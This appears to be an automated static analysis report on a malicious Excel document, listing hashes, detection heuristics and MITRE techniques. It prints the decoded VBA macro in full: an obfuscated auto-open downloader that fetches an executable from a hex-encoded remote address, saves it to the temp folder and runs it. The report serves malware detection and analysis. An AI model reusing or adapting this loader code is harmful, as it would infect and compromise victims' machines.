Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f6d780eee13390c…

MALICIOUS

Office (OLE)

24.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-01-04
MD5: 12a329ec30a90b57ad5d65261a03038c SHA-1: e58c4856ffc75c2f9cbf757c4d9058342e4cedad SHA-256: 3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains both Excel 4.0 (XLM) and VBA macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA script attempts to download a file using MSXML2.XMLHTTP and then executes it using CreateObject("Shell.Application"), likely saving it to a temporary directory. The XLM macros are less clear but indicate macro sheet usage. The combination of obfuscated auto-execution and payload download points to a downloader or initial access stage.

Heuristics 9

  • Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 602 bytes
SHA-256: 3fa62bd3570fd5ef8fae805a928b3ccc3c6451937644bacbdd5508fc2ec659f6
Preview script
First 1,000 lines of the extracted script
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     22 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    0 : 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3057 bytes
SHA-256: 05e929e61895168e58c8c5ef6a9083d3ce0b9e1890772d37dca9dbd05e0a244f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Function rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta(ByVal gtretret As String) As String
  Dim i       As Long
  For i = 1 To Len(gtretret) Step 2

Dim MexzDXUy As Integer
MexzDXUy = 3
Do While MexzDXUy < 81
DoEvents: MexzDXUy = MexzDXUy + 1
Loop

  rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  Next i
 End Function

Sub Auto_Open()
NGHDLXMAJBA
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
     Dim EYQNARIIOVP As Object, GUTUPYZSTWJ As Long, LJDEHVYKBYP As Long, VCAJTUXQHLA() As Byte

    Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
    EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
    EYQNARIIOVP.Send "sdfggdgdfg"


    VCAJTUXQHLA = EYQNARIIOVP.responseBody

    LJDEHVYKBYP = FreeFile

    Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
    Put #LJDEHVYKBYP, , VCAJTUXQHLA
    Close #LJDEHVYKBYP
    
Set GBIviviu67FUGBK = CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))
GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Function
Sub NGHDLXMAJBA()
fdgBBBB = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("687474703A2F2F33382E39362E3137352E3133393A383038302F737461742F6C6C64762E706870")
    IQQKFERUGKJ fdgBBBB, Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.